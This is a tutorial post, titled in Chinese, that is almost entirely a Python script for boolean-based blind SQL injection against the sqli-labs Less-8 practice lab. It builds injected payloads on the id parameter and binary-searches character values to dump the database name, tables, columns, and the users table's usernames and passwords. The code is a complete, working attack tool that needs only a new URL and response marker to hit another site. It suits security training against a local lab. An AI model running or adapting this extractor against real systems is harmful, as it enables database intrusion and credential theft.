基于布尔的盲注（Boolean-based blind SQL injection）Python 脚本 —— 以 sqli-labs Less-8 为靶场

 

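# coding: utf-8
# Minimal `requests` warm-up: fetch one page and look at the Response object.
# The original cookie was "# coding = utf-8"; PEP 263 allows no whitespace
# before the "=" so it was never recognised (harmless on Python 3, where UTF-8
# is the default, but a SyntaxError on Python 2 with the non-ASCII comments).
import requests

url = 'http://www.baidu.com'
# Always bound a network call: without a timeout a stalled server blocks the
# process forever.  Network/HTTP errors surface as requests.RequestException.
ret = requests.get(url, timeout=10)
print(type(ret))  # <class 'requests.models.Response'>
print(ret)  # <Response [200]>
print(ret.text)  # body decoded to str (encoding guessed from headers/content)
print(ret.content)  # raw body bytes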

  

  1 # coding:utf-8
  2 import requests
  3 
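# --- Boolean-based blind SQL injection against sqli-labs Less-8 ---------------
#
# Every SQL string built below is the attacker payload by design; building it
# by string formatting is the point, not something to parameterise away.  Run
# it only against a target you are authorised to test (the defaults point at a
# local sqli-labs install).

TARGET_URL = "http://127.0.0.1/sqli-labs/Less-8/index.php"
# Text that only Less-8's "condition was true" page contains.
TRUE_MARKER = "You are in"
# Per-probe timeout in seconds; the original had none, so one stalled response
# would hang the whole extraction.
REQUEST_TIMEOUT = 10


def _http_oracle(condition, *, url=TARGET_URL, true_marker=TRUE_MARKER,
                 timeout=REQUEST_TIMEOUT):
    """Send one probe and return True iff the injected SQL ``condition`` held.

    The payload ``1' and (<condition>)#`` closes the original string literal,
    ANDs in the condition and comments out the rest of the query.  Sending it
    via ``params`` lets requests percent-encode it (``#`` becomes ``%23``, which
    the original script appended by hand).

    Args:
        condition: SQL boolean expression (our own payload, not user input).
        url: vulnerable endpoint; ``id`` is the injectable GET parameter.
        true_marker: substring present in the response only when the
            condition held.
        timeout: per-request timeout in seconds.

    Returns:
        True if ``true_marker`` occurs in the response body, else False.

    Raises:
        requests.RequestException: on connection failure or timeout.
    """
    payload = f"1' and ({condition})#"
    response = requests.get(url, params={"id": payload}, timeout=timeout)
    return true_marker in response.text


def _oracle(probe):
    """Return ``probe`` if given, else the default HTTP oracle."""
    return probe if probe is not None else _http_oracle


def _extract(expr, probe, max_len=None):
    """Recover the string value of SQL expression ``expr`` one character at a time.

    Each character is located by a binary search on
    ``ascii(substr((expr), pos, 1)) > mid`` over 0..255: 8 probes per character
    instead of one probe per candidate, and no dependence on a hand-picked
    alphabet (the original silently skipped characters outside its charset).
    Comparing byte values also avoids the trap of ``substr(...)='S'`` matching
    's' under MySQL's case-insensitive default collation, which made the
    original report upper-cased names.

    Extraction stops when ``ascii()`` yields 0 — ``substr`` ran past the end
    (or the expression is NULL, whose comparison is never true) — or after
    ``max_len`` characters.  Progress is printed as it accumulates, as before.

    Args:
        expr: SQL expression yielding one string; a scalar subquery is fine,
            it is parenthesised here.
        probe: boolean oracle, callable(condition: str) -> bool.
        max_len: cap on characters to recover, or None for "until the end".

    Returns:
        The recovered string (possibly empty).
    """
    found = []
    pos = 1
    while max_len is None or pos <= max_len:
        lo, hi = 0, 255  # ascii() of one byte; 0 doubles as "past the end"
        while lo < hi:
            mid = (lo + hi) // 2
            if probe(f"ascii(substr(({expr}),{pos},1))>{mid}"):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        found.append(chr(lo))
        print("".join(found))
        pos += 1
    return "".join(found)


def database_len(*, probe=None, max_len=64):
    """Find ``length(database())`` by binary search over 0..``max_len``.

    The original walked ``length(database())>i`` for i in 1..9 and printed
    nothing for a name of 10+ characters; the bound is now a parameter and an
    overflow is reported instead of ignored.

    Args:
        probe: boolean oracle, callable(condition) -> bool; defaults to the
            HTTP oracle against TARGET_URL.
        max_len: largest length considered.

    Returns:
        The length, or None if it exceeds ``max_len``.
    """
    ask = _oracle(probe)
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(f"length(database())>{mid}"):
            lo = mid + 1
        else:
            hi = mid
    # lo is the least value the length does not exceed.  If it sits on the
    # cap, one more probe tells whether the real length lies beyond it.
    if lo == max_len and ask(f"length(database())>{lo}"):
        print("database_length: more than", max_len)
        return None
    print("database_length:", lo)
    return lo


def database_name(*, probe=None, max_len=None):
    """Recover ``database()``; see ``_extract`` for the method.

    Args:
        probe: boolean oracle; defaults to the HTTP oracle.
        max_len: cap on characters, or None for the whole name.

    Returns:
        The database name.
    """
    name = _extract("database()", _oracle(probe), max_len)
    print("database_name:", name)
    return name


def tables_name(*, probe=None, max_len=None):
    """Recover the comma-joined table names of the current database.

    NOTE: group_concat output is truncated at the server's
    group_concat_max_len (1024 bytes by default); a long list comes back cut.

    Args:
        probe: boolean oracle; defaults to the HTTP oracle.
        max_len: cap on characters, or None for the whole list.

    Returns:
        The recovered list, e.g. ``"emails,users"``.
    """
    expr = ("select group_concat(table_name) from information_schema.tables "
            "where table_schema=database()")
    name = _extract(expr, _oracle(probe), max_len)
    print("table_name:", name)
    return name


def columns_name(*, table="users", probe=None, max_len=None):
    """Recover the comma-joined column names of ``table`` in the current database.

    Args:
        table: table to inspect.  It is spliced into our own payload inside
            single quotes, so keep it a plain identifier; a quote in it would
            break the query.
        probe: boolean oracle; defaults to the HTTP oracle.
        max_len: cap on characters, or None for the whole list.

    Returns:
        The recovered list, e.g. ``"id,username,password"``.
    """
    expr = ("select group_concat(column_name) from information_schema.columns "
            f"where table_schema=database() and table_name='{table}'")
    name = _extract(expr, _oracle(probe), max_len)
    print("column_name:", name)
    return name


def username_value(*, table="users", probe=None, max_len=None):
    """Dump the comma-joined ``username`` column of ``table``.

    Subject to the same group_concat_max_len truncation as ``tables_name``.

    Args:
        table: table holding the column (spliced unquoted into the payload).
        probe: boolean oracle; defaults to the HTTP oracle.
        max_len: cap on characters, or None for everything.

    Returns:
        The recovered values.
    """
    name = _extract(f"select group_concat(username) from {table}",
                    _oracle(probe), max_len)
    print("username_value:", name)
    return name


def password_value(*, table="users", probe=None, max_len=None):
    """Dump the comma-joined ``password`` column of ``table``.

    Subject to the same group_concat_max_len truncation as ``tables_name``.

    Args:
        table: table holding the column (spliced unquoted into the payload).
        probe: boolean oracle; defaults to the HTTP oracle.
        max_len: cap on characters, or None for everything.

    Returns:
        The recovered values.
    """
    name = _extract(f"select group_concat(password) from {table}",
                    _oracle(probe), max_len)
    print("password_value:", name)
    return name


if __name__ == "__main__":
    # Same sequence as the original script, but only when run directly:
    # importing the module no longer fires hundreds of requests at the target.
    database_len()
    database_name()
    tables_name()
    columns_name()
    username_value()
    password_value()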

 
